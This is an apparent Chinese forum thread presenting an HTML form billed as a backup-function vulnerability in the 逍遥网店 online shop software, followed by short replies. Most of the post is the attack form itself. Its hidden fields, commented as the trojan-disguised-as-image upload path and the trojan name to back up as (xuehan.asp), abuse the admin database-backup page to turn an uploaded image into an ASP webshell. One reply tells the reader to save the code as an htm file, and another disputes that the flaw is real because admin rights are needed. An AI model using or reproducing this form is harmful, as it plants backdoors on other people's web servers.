逍遥网店所有版本后台数据备份漏洞
以下是源代码:
<script language=javascript src=http://www.99**.com/include/mouse_on_title.js></script>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="manage.css" type="text/css">
</head>
<BODY background="../images/admin/back.gif">
<table width="98%" border="1" style="border-collapse: collapse; border-style: dotted; border-width: 0px"
bordercolor="#333333" cellspacing="0" cellpadding="2">
<form action=http://www.99**.com/admin/safe5.asp method=post name=backup>
<tr class=backs><td colspan=2 class=td height=18>数据库在线维护</td></tr>
<input type="hidden" name="oldpath" value="../pic/digi/0063.jpg"><!--木马改图片上传后的路径-->
<input type="hidden" name="DBname" size="20" value="xuehan.asp"><!--要备份的木马路径-->
<tr><td colspan=2 heigh=50>从未备份数据库文件</td></tr>
<tr><td colspan=2>
<input title='备份正在使用的数据库文件' type="submit" name="Submit" value="备份" onclick="{if(confirm('备份正在使用的数据库文件,有道是常"备"无患,出了问题后可用于恢复!\n\n备份文件将保存在后台目录里,只要后台目录不公开,放在这里的文件就非常安全。\n\n单击确定继续,单击取消返回。')){this.document.backup.submit();return true;}return false;}">
<input title='对备份的数据库文件进行压缩和修复' type='button' value='压缩' onclick="{if(confirm('对数据库备份文件进行压缩,减少占用空间,还可修复数据库错误。\n\n正在使用的数据库不能压缩,请按"备份"—"压缩"—"恢复"的流程操作。\n\n单击确定继续,单击取消返回。 ')){location.href='safe5.asp?action=yasuo';}}">
<input title='用备份文件覆盖正式数据库文件' type='button' value='恢复' onclick="{if(confirm('用数据库备份文件覆盖正式的数据库文件,单击确定继续,单击取消返回。')){location.href='safe5.asp?action=huifu';}}">
<input title='删除数据库备份文件' type='button' value='删除' onclick="{if(confirm('删除备份的数据库文件(即后台目录里的备份文件shopbackup.mdb)。\n\n单击确定继续,单击取消返回。')){location.href='safe5.asp?action=del';}}">
<input title='将备份的数据库下载到本地保存' type='button' value='下载' onclick="{if(confirm('将数据库备份文件下载到自己的电脑中保存一份,以备不测。\n\n不怕一万,只怕万一 ^_^ 需要时可上传并恢复数据库。\n\n单击确定继续,单击取消返回。 ')){location.href='safe5.asp?action=down';}}">
<INPUT title='将本地数据库文件上传到网站' TYPE="button" value="上传" onClick="window.open('upload.asp?fuptype=db&fupname=shopbackup&frmname=db','blank_','scrollbars=yes,resizable=no,width=650,height=450')">
<input type="hidden" name="backup" value="ok">
</td></tr>
</form>
</table>
<br><font color=red>※提示:</font><br><br>
此操作需FSO功能支持。<br>
执行此操作前,请先关闭其它网页窗口,断开FTP连接。<br>
提交后,请耐心等待<font color=red>(请不要重复点击上面的按钮),</font>完成时间视网络状况而定。<br>
请在网络空闲时进行此操作,<b>执行此操作可能导致服务器变慢或不稳定</b>。
姓名:Chinadu
代码我看不太懂,这个漏洞有什么作用啊?请问如何利用此漏洞进行攻击?
将以上代码保存为任意htm文件.
...
不是什么漏洞,是网站正常功能,不要大惊不怪。
备份是需要管理员权限的,如果不速之客有了管理员权限,还用备份?多此一举。随便编辑个商品,不就完事了。
如果连后台管理员都不能操作数据,那这商城功能也就是垃圾一堆。